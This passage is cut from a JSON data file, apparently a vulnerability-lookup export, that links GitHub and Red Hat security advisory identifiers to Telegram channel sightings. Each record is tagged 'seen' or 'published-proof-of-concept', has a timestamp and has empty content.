"2026-04-06T21:21:26.000000Z"}, {"uuid": "eebf8be9-8a10-4403-963b-295af1483e8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2WVG-62QM-GJ33", "type": "published-proof-of-concept", "source": "Telegram/xKxKUYX0BRejEqYlrURXsjCQY9BctYcoeewN_mSMWqY7riM", "content": "", "creation_timestamp": "2026-04-06T21:21:26.000000Z"}, {"uuid": "d8557ef4-d97d-4aab-ae1e-d8623f6dcb82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JG4P-7FHP-P32P", "type": "seen", "source": "Telegram/baQtFg_KM2b993Xinx1K-rl9rafgMn1ApK9JhHyMaH5eo0M", "content": "", "creation_timestamp": "2026-04-06T23:22:01.000000Z"}, {"uuid": "1e27fb21-c69e-4374-b2d1-243cf3adc4b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JG56-WF8X-QRV5", "type": "seen", "source": "Telegram/baQtFg_KM2b993Xinx1K-rl9rafgMn1ApK9JhHyMaH5eo0M", "content": "", "creation_timestamp": "2026-04-06T23:22:01.000000Z"}, {"uuid": "f2e21f40-f0bb-453c-83e4-e43e8d79e926", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G8MV-VP7J-QP64", "type": "seen", "source": "Telegram/baQtFg_KM2b993Xinx1K-rl9rafgMn1ApK9JhHyMaH5eo0M", "content": "", "creation_timestamp": "2026-04-06T23:22:01.000000Z"}, {"uuid": "e7e97a45-0a74-4e84-a1a9-52154adcb339", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7PJ2-232X-6698", "type": "seen", "source": "Telegram/baQtFg_KM2b993Xinx1K-rl9rafgMn1ApK9JhHyMaH5eo0M", "content": "", "creation_timestamp": "2026-04-06T23:22:01.000000Z"}, {"uuid": "b5b39175-b895-4d82-9376-7c0bfddc2d52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V6W6-338P-P256", "type": "seen", "source": "Telegram/baQtFg_KM2b993Xinx1K-rl9rafgMn1ApK9JhHyMaH5eo0M", "content": "", "creation_timestamp": "2026-04-06T23:22:01.000000Z"}, {"uuid": "9ff64833-8c7f-49f0-84ac-4a60f4b8abfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CX82-8XRH-7F5C", "type": "seen", "source": "Telegram/2sVgvXJxKnqdd0t3ix7z2PFFoP4qMIqNMJ7HHwXtd94aJL4", "content": "", "creation_timestamp": "2026-04-07T19:33:54.000000Z"}, {"uuid": "3d298c27-f5ac-4cc4-b63b-93c3eabc96f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3G6G-GQ4R-XJM9", "type": "seen", "source": "Telegram/2sVgvXJxKnqdd0t3ix7z2PFFoP4qMIqNMJ7HHwXtd94aJL4", "content": "", "creation_timestamp": "2026-04-07T19:33:54.000000Z"}, {"uuid": "d20bf462-ecb5-4445-b767-560237cb2b2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6C37-7W4P-JG9V", "type": "seen", "source": "Telegram/2sVgvXJxKnqdd0t3ix7z2PFFoP4qMIqNMJ7HHwXtd94aJL4", "content": "", "creation_timestamp": "2026-04-07T19:33:54.000000Z"}, {"uuid": "e4231c11-3af2-47eb-a9e9-7ce823bbd564", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JVPW-637P-H3PW", "type": "seen", "source": "Telegram/2sVgvXJxKnqdd0t3ix7z2PFFoP4qMIqNMJ7HHwXtd94aJL4", "content": "", "creation_timestamp": "2026-04-07T19:33:54.000000Z"}, {"uuid": "4a72424d-ac23-4d80-b851-960cfdc07ab7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V9W4-GM2X-6RVF", "type": "seen", "source": "Telegram/2sVgvXJxKnqdd0t3ix7z2PFFoP4qMIqNMJ7HHwXtd94aJL4", "content": "", "creation_timestamp": "2026-04-07T19:33:54.000000Z"}, {"uuid": "ceec33ee-cc93-4e48-9025-2e1191dfdc3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2866", "type": "seen", "source": "Telegram/zfToAAWf8eWnJ7ba07A0EZZ_iZLhP55gYdeGjYzJA6KMcCw", "content": "", "creation_timestamp": "2026-04-06T15:19:47.000000Z"}, {"uuid": "ab4a0e26-1743-4ff2-9407-8739f060926e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7163", "type": "seen", "source": "Telegram/zfToAAWf8eWnJ7ba07A0EZZ_iZLhP55gYdeGjYzJA6KMcCw", "content": "", "creation_timestamp": "2026-04-06T15:19:47.000000Z"}, {"uuid": "f61f394a-c4ab-485e-b279-10e17eb5aa18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7165", "type": "seen", "source": "Telegram/zfToAAWf8eWnJ7ba07A0EZZ_iZLhP55gYdeGjYzJA6KMcCw", "content": "", "creation_timestamp": "2026-04-06T15:19:47.000000Z"}, {"uuid": "98f98f2f-4bfe-486d-ba5e-0503907b5965", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2866", "type": "seen", "source": "Telegram/2BMM755ne3lal0lwprVbbhsIWa6rcrWtzsF6kYgV_L6gHDk", "content": "", "creation_timestamp": "2026-04-06T15:20:35.000000Z"}, {"uuid": "de7b5445-81a4-48ed-9221-67a8bc950bd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7163", "type": "seen", "source": "Telegram/2BMM755ne3lal0lwprVbbhsIWa6rcrWtzsF6kYgV_L6gHDk", "content": "", "creation_timestamp": "2026-04-06T15:20:35.000000Z"}, {"uuid": "b315e124-5c25-4eeb-82ed-d486ced446c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7165", "type": "seen", "source": "Telegram/2BMM755ne3lal0lwprVbbhsIWa6rcrWtzsF6kYgV_L6gHDk", "content": "", "creation_timestamp": "2026-04-06T15:20:35.000000Z"}, {"uuid": "3ffacf4a-12f9-4ba6-bd5f-6c187018c923", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2880", "type": "seen", "source": "Telegram/2BMM755ne3lal0lwprVbbhsIWa6rcrWtzsF6kYgV_L6gHDk", "content": "", "creation_timestamp": "2026-04-06T15:20:35.000000Z"}, {"uuid": "c25e29af-11f7-4120-ad39-f9ee01d004e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2502", "type": "seen", "source": "Telegram/YPTFZMnbtWpnAikWtS-r7Wh5pSyLx87YJDgdlbqcufwDCfc", "content": "", "creation_timestamp": "2026-04-06T15:21:07.000000Z"}, {"uuid": "7cef89fb-24b9-44e1-b271-8d48ca328f69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2873", "type": "seen", "source": "Telegram/YPTFZMnbtWpnAikWtS-r7Wh5pSyLx87YJDgdlbqcufwDCfc", "content": "", "creation_timestamp": "2026-04-06T15:21:07.000000Z"}, {"uuid": "7b778e9d-ba0b-4b58-a366-43a051af0e29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2879", "type": "seen", "source": "Telegram/XnXiOLLeSA7x6QvYztZ81GubEg3cvrCefUsx39ENip1AnlE", "content": "", "creation_timestamp": "2026-04-06T15:21:14.000000Z"}, {"uuid": "cd826d34-bc60-4c7e-a890-71bcd8a8a739", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2874", "type": "seen", "source": "Telegram/XnXiOLLeSA7x6QvYztZ81GubEg3cvrCefUsx39ENip1AnlE", "content": "", "creation_timestamp": "2026-04-06T15:21:14.000000Z"}, {"uuid": "56247b5f-8260-4184-949b-3c3b11cdbd2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RPMG-J327-MR39", "type": "seen", "source": "Telegram/ZR_wkJT-g6xqpr38tjocBfuP9bsA0qHKZRvqY91xv80DRmI", "content": "", "creation_timestamp": "2026-04-10T21:24:20.000000Z"}, {"uuid": "85938c54-ffa7-41a7-96f6-0740ad5529ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3GQC-XR75-PCPW", "type": "seen", "source": "Telegram/ZR_wkJT-g6xqpr38tjocBfuP9bsA0qHKZRvqY91xv80DRmI", "content": "", "creation_timestamp": "2026-04-10T21:24:20.000000Z"}, {"uuid": "055c7fdb-908f-4ea8-8530-bb8e0a0f3bf4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9RCC-W59J-965V", "type": "published-proof-of-concept", "source": "Telegram/0wjdVVOdHVRh-NR-AUdnOvX_Jcqqbi6lE8Vl80iGy2s6Zy0", "content": "", "creation_timestamp": "2026-04-06T19:29:29.000000Z"}, {"uuid": "005343dc-a2af-43b1-a5f4-4ada7a47cfef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FGV4-6JR3-JGFW", "type": "published-proof-of-concept", "source": "Telegram/0wjdVVOdHVRh-NR-AUdnOvX_Jcqqbi6lE8Vl80iGy2s6Zy0", "content": "", "creation_timestamp": "2026-04-06T19:29:29.000000Z"}, {"uuid": "c47b80cd-dcbf-42a4-9d00-5411dfe969df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8W8H-3PV2-3554", "type": "seen", "source": "Telegram/yDDpU4nC0b44IAL16-yoyqmXwVbKF5D32H81GUj_gS-e3jc", "content": "", "creation_timestamp": "2026-04-07T17:29:27.000000Z"}, {"uuid": "a446414e-b3b6-4c21-bbcb-4d82623a9aa4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JMRH-XMGH-X9J4", "type": "seen", "source": "Telegram/yDDpU4nC0b44IAL16-yoyqmXwVbKF5D32H81GUj_gS-e3jc", "content": "", "creation_timestamp": "2026-04-07T17:29:27.000000Z"}, {"uuid": "dd161213-ae69-440b-8090-a8b553c9f894", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R6CR-MVR9-F6WX", "type": "published-proof-of-concept", "source": "Telegram/b7kqkVlyu_pyGML8IRNuJF5vW46V1gBKnrWAnE54KrYglqM", "content": "", "creation_timestamp": "2026-04-07T19:35:02.000000Z"}, {"uuid": "1b6886c1-b969-48b2-9254-0caba6f002f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-44X3-28JV-MRWQ", "type": "published-proof-of-concept", "source": "Telegram/b7kqkVlyu_pyGML8IRNuJF5vW46V1gBKnrWAnE54KrYglqM", "content": "", "creation_timestamp": "2026-04-07T19:35:02.000000Z"}, {"uuid": "7aed4b3d-7744-4e16-89bf-93e31d8cdcd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X9H5-R9V2-VCWW", "type": "seen", "source": "Telegram/sslKRMt7XnAICw7zsZDqotnt2tiVrXD0JXK6a_6QUxCGOW4", "content": "", "creation_timestamp": "2026-04-13T23:21:07.000000Z"}, {"uuid": "8fee8761-db07-4524-8e5e-1840c90d3cc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R54V-QQ87-PX5R", "type": "seen", "source": "Telegram/sslKRMt7XnAICw7zsZDqotnt2tiVrXD0JXK6a_6QUxCGOW4", "content": "", "creation_timestamp": "2026-04-13T23:21:07.000000Z"}, {"uuid": "f291a6e7-ae08-4470-a04d-61e4e278715f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2453-MPPF-46CJ", "type": "seen", "source": "Telegram/sslKRMt7XnAICw7zsZDqotnt2tiVrXD0JXK6a_6QUxCGOW4", "content": "", "creation_timestamp": "2026-04-13T23:21:07.000000Z"}, {"uuid": "f1d74352-8bb8-476a-9478-5a05c4626f5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FWVM-GGF6-2P4X", "type": "published-proof-of-concept", "source": "Telegram/_DNd18EV1_mvoOjDBqQ_at4zOgBzw_-F-OvAJ7pAjcWk8VU", "content": "", "creation_timestamp": "2026-04-13T23:21:32.000000Z"}, {"uuid": "b7d43215-09a7-4e39-9280-6e6daec5f519", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C7XP-Q6Q8-HG76", "type": "seen", "source": "Telegram/6RgwCZFc4Ae1eVERGO141ZaFCzd_AoL4kSRzFJKo9cZLKyo", "content": "", "creation_timestamp": "2026-04-09T21:22:00.000000Z"}, {"uuid": "1b1f405c-ec6a-469a-98a6-e51b65169688", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XX5W-CVP6-JV83", "type": "published-proof-of-concept", "source": "Telegram/J52JBZg8WrLGGx6kRSNOXLCMOEds74O2ZZxihtNidTT3Fd0", "content": "", "creation_timestamp": "2026-04-09T21:22:18.000000Z"}, {"uuid": "4dc43b44-2b89-4b94-939e-f8f8088acdb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W7V2-9CMR-PWWJ", "type": "published-proof-of-concept", "source": "Telegram/J52JBZg8WrLGGx6kRSNOXLCMOEds74O2ZZxihtNidTT3Fd0", "content": "", "creation_timestamp": "2026-04-09T21:22:18.000000Z"}, {"uuid": "38097e6f-2aad-4760-9e24-613ed9d06b98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-48VW-M3QC-WR99", "type": "seen", "source": "Telegram/G3Fi-nNLRGY8ZLcJORLcPgOLisPY2kSgZDa_wKJf-COsCMo", "content": "", "creation_timestamp": "2026-04-09T23:30:34.000000Z"}, {"uuid": "0da9b189-2d92-4ca1-b475-c3cd63644c7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V7PX-3835-7GJX", "type": "seen", "source": "Telegram/1cCualj_PQDoYUsDnolnQpk7NGC4b1xwJPWps9hRWMxLLCE", "content": "", "creation_timestamp": "2026-04-09T23:30:43.000000Z"}, {"uuid": "c5da132e-5a43-4a50-aa48-49f9415fe391", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HM7R-C7QW-GHP6", "type": "seen", "source": "Telegram/t1F-Vx_aulmn07lvg5ppSTSOssGvqtwkUpkkBVUVRj_FPlk", "content": "", "creation_timestamp": "2026-04-06T19:29:09.000000Z"}, {"uuid": "2ad35d3d-4047-4d6f-b955-d35190715a33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WC4H-2348-JC3P", "type": "seen", "source": "Telegram/t1F-Vx_aulmn07lvg5ppSTSOssGvqtwkUpkkBVUVRj_FPlk", "content": "", "creation_timestamp": "2026-04-06T19:29:09.000000Z"}, {"uuid": "7992313e-5838-44de-a012-bacb378ae447", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GXRM-PF64-99XM", "type": "published-proof-of-concept", "source": "Telegram/OQovZCNyncHtmKsEQoVAn9WglYI3Qk-HPEu8DU-i8r2-BaQ", "content": "", "creation_timestamp": "2026-04-07T15:21:30.000000Z"}, {"uuid": "316a79f6-9d55-40db-a8cf-664683caf0a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3VHP-H532-MC3F", "type": "published-proof-of-concept", "source": "Telegram/QBh1F_HyWJUCKYAyST3Bw6jIrLbUd_JEHanO8DcWQ_ylla0", "content": "", "creation_timestamp": "2026-04-07T15:21:06.000000Z"}, {"uuid": "010c03e8-2d7d-4ab0-ba4c-84a974e9bf1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8PFC-JJGW-6G26", "type": "seen", "source": "Telegram/JtakylbYKAfJvC_RBIgmgtreOTLAC-U_R5YdC-v7gW7NnsM", "content": "", "creation_timestamp": "2026-04-07T17:28:27.000000Z"}, {"uuid": "611b8318-9604-4f61-ae53-9611d29880e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W48F-WWWF-F5FR", "type": "seen", "source": "Telegram/S0o7tCbZtDmnRvZjM5kXvvB9yXwoblxnXV5GlrmaLffoEZI", "content": "", "creation_timestamp": "2026-04-07T17:29:08.000000Z"}, {"uuid": "c7ed8dd4-ce03-4afa-950a-410895140969", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CQFX-GF56-8X59", "type": "seen", "source": "Telegram/S0o7tCbZtDmnRvZjM5kXvvB9yXwoblxnXV5GlrmaLffoEZI", "content": "", "creation_timestamp": "2026-04-07T17:29:08.000000Z"}, {"uuid": "d2049800-398b-4c9f-af0f-1dfcf9ec40fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4744-96P5-MP2J", "type": "seen", "source": "Telegram/S0o7tCbZtDmnRvZjM5kXvvB9yXwoblxnXV5GlrmaLffoEZI", "content": "", "creation_timestamp": "2026-04-07T17:29:08.000000Z"}, {"uuid": "241fa89a-c30e-4673-80d3-41802a8be5d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R7MC-X6X7-CQXX", "type": "seen", "source": "Telegram/S0o7tCbZtDmnRvZjM5kXvvB9yXwoblxnXV5GlrmaLffoEZI", "content": "", "creation_timestamp": "2026-04-07T17:29:08.000000Z"}, {"uuid": "a3492465-1c5b-4d9e-985d-c547877f6543", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V5HW-CV9C-RPG7", "type": "seen", "source": "Telegram/S0o7tCbZtDmnRvZjM5kXvvB9yXwoblxnXV5GlrmaLffoEZI", "content": "", "creation_timestamp": "2026-04-07T17:29:08.000000Z"}, {"uuid": "b3228664-150e-4c35-9fff-475fc2ba8f59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VMFG-C69G-M8P8", "type": "seen", "source": "Telegram/yEep_Cm2Odjvpf0uI90hS1hr8dhkmidpoORZ8hNAmW5Xwfo", "content": "", "creation_timestamp": "2026-04-07T19:35:16.000000Z"}, {"uuid": "adefd2d5-7629-4c1b-90de-6648a8ecfdc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C5C6-37VQ-PJCQ", "type": "seen", "source": "Telegram/v8IgW6gHpWVIushUEONWR1rBf1AadyMpGfLyvEGnY-900sw", "content": "", "creation_timestamp": "2026-03-31T03:17:25.000000Z"}, {"uuid": "0ccae11a-08c2-456b-b70a-57aa519bd151", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-677C-XV24-CRGX", "type": "seen", "source": "Telegram/v8IgW6gHpWVIushUEONWR1rBf1AadyMpGfLyvEGnY-900sw", "content": "", "creation_timestamp": "2026-03-31T03:17:25.000000Z"}, {"uuid": "a7209c77-2fc2-4e6c-b3fb-ea263ba7900b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X744-4WPC-V9H2", "type": "published-proof-of-concept", "source": "Telegram/84MSU-hIhNrWnS8A8cOqhlUxSHC6aqIIGr26pihaT5cA3PI", "content": "", "creation_timestamp": "2026-03-31T05:17:29.000000Z"}, {"uuid": "8cd749f7-9ec7-453d-9e83-a5d09700f5fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W8FP-G9RH-34JH", "type": "published-proof-of-concept", "source": "Telegram/84MSU-hIhNrWnS8A8cOqhlUxSHC6aqIIGr26pihaT5cA3PI", "content": "", "creation_timestamp": "2026-03-31T05:17:29.000000Z"}, {"uuid": "64f5bd4a-0ed2-4ae7-91f5-fc7b518d503f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5GHQ-42RG-769X", "type": "seen", "source": "Telegram/t1F-Vx_aulmn07lvg5ppSTSOssGvqtwkUpkkBVUVRj_FPlk", "content": "", "creation_timestamp": "2026-04-06T19:29:09.000000Z"}, {"uuid": "d1300f0c-4f8b-4e72-81f4-40d9c33e3dda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3JR7-6HQP-X679", "type": "seen", "source": "Telegram/NqFWw_Bg_JewL_I29Tb0q1DIosuMN7rhj0bJY4LtsK35hxc", "content": "", "creation_timestamp": "2026-04-04T01:18:11.000000Z"}, {"uuid": "b2c8c012-5b92-42c0-8e3d-b2c2426939a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2RCC-JG83-34VP", "type": "seen", "source": "Telegram/NqFWw_Bg_JewL_I29Tb0q1DIosuMN7rhj0bJY4LtsK35hxc", "content": "", "creation_timestamp": "2026-04-04T01:18:11.000000Z"}, {"uuid": "4a1f710e-6569-4112-bdc0-51bf83854678", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-365W-2M69-MP9X", "type": "seen", "source": "Telegram/NqFWw_Bg_JewL_I29Tb0q1DIosuMN7rhj0bJY4LtsK35hxc", "content": "", "creation_timestamp": "2026-04-04T01:18:11.000000Z"}, {"uuid": "a4670658-b689-4a97-ab71-a42a0519be15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9GM9-C8MQ-VQ7M", "type": "published-proof-of-concept", "source": "Telegram/ezSRO2n6kkNgiasayGpOrLqy53F2jkH_PorQ5yznSyeF-oc", "content": "", "creation_timestamp": "2026-04-04T01:18:36.000000Z"}, {"uuid": "7833ec6e-e4a0-40a5-80c7-a7590f0e93f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W37C-QQFP-C67F", "type": "published-proof-of-concept", "source": "Telegram/ezSRO2n6kkNgiasayGpOrLqy53F2jkH_PorQ5yznSyeF-oc", "content": "", "creation_timestamp": "2026-04-04T01:18:36.000000Z"}, {"uuid": "39e2a985-e422-4de3-83b8-253972d01d05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-44C2-3RW4-5GVH", "type": "seen", "source": "Telegram/Wq2MikHHjaMT3QcZYic1EqOjYlzbZBeR3fuLUZ6lQSb49CA", "content": "", "creation_timestamp": "2026-04-04T01:18:49.000000Z"}, {"uuid": "55fdaeaf-5cdc-4102-ade6-3bd2e9acf7a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9WFR-W7MM-PC7F", "type": "seen", "source": "Telegram/Wq2MikHHjaMT3QcZYic1EqOjYlzbZBeR3fuLUZ6lQSb49CA", "content": "", "creation_timestamp": "2026-04-04T01:18:49.000000Z"}, {"uuid": "789907df-16ae-4b88-8e96-c789e58625ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2862", "type": "seen", "source": "Telegram/2BMM755ne3lal0lwprVbbhsIWa6rcrWtzsF6kYgV_L6gHDk", "content": "", "creation_timestamp": "2026-04-06T15:20:35.000000Z"}, {"uuid": "dabf7ce5-9064-4830-a40e-2ea0991a0ed9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2500", "type": "seen", "source": "Telegram/2BMM755ne3lal0lwprVbbhsIWa6rcrWtzsF6kYgV_L6gHDk", "content": "", "creation_timestamp": "2026-04-06T15:20:35.000000Z"}, {"uuid": "f06fc4b0-70d5-4d91-96c8-b1f664e33b6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2866", "type": "seen", "source": "Telegram/8HAXDkwfUuERvEZPrRm02gndBwAxNxuQaWo6blnqeOPCpO4", "content": "", "creation_timestamp": "2026-04-06T15:20:42.000000Z"}, {"uuid": "b4205b53-8e50-4829-9461-c319f62994fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7163", "type": "seen", "source": "Telegram/8HAXDkwfUuERvEZPrRm02gndBwAxNxuQaWo6blnqeOPCpO4", "content": "", 